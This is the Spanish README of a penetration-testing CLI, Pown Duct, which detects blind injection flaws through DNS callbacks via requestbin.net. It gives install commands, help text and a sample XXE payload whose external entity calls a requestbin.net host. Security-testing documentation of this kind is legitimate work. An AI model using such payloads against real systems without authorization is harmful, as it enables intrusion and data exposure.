
Herramienta esencial para encontrar ataques de inyección ciega.
Herramienta esencial para encontrar ataques de inyección ciega utilizando canales laterales de DNS.
Esta herramienta forma parte de la iniciativa de código abierto de secapps.com.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB: Esta herramienta aprovecha el servicio http://requestbin.net. Versiones futuras utilizarán una infraestructura dedicada y personalizada.
Esta herramienta está diseñada para usarse como parte de Pown.js, pero también se puede invocar de forma independiente.
Primero, instala Pown como de costumbre:
$ npm install -g pown@latest
Invoca directamente desde Pown:
$ pown duct
De lo contrario, instala este módulo localmente desde la raíz de tu proyecto:
$ npm install @pown/duct --save
Una vez hecho esto, invoca la CLI de pown:
$ ./node_modules/.bin/pown-cli duct
También puedes usar el pown global para invocar la herramienta localmente:
$ POWN_ROOT=. pown duct
pown duct <command>
Habilitador de ataques de canal lateral
Commands:
pown duct dns Ducting de DNS
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
Ducting de DNS
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restaurar canal [string]
--output Formato de salida [string] [choices: "string", "hexdump", "json"] [default: "string"]
Hay casos en los que necesitamos realizar un ataque como inyección SQL, XSS, XXE o SSRF, pero la aplicación objetivo no proporciona ninguna indicación de que sea vulnerable. Una forma de asegurarse de si una vulnerabilidad está presente es intentar inyectar un vector de ataque válido que obligue a un resolvedor DNS a preguntar por un dominio controlado. Si la resolución es exitosa, el ataque se considerará exitoso.
NOTA: Es posible que estés familiarizado con Burp Collaborator, que proporciona un servicio similar para clientes.
Primero, necesitamos un nombre DNS desechable para resolver:
$ pown duct dns
captura de pantalla
Usando el DNS proporcionado, compón tu payload. Por ejemplo, lo siguiente podría desencadenar una resolución DNS si existe una vulnerabilidad XXE.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
Si el ataque fue exitoso, recibiremos un mensaje en la terminal.
captura de pantalla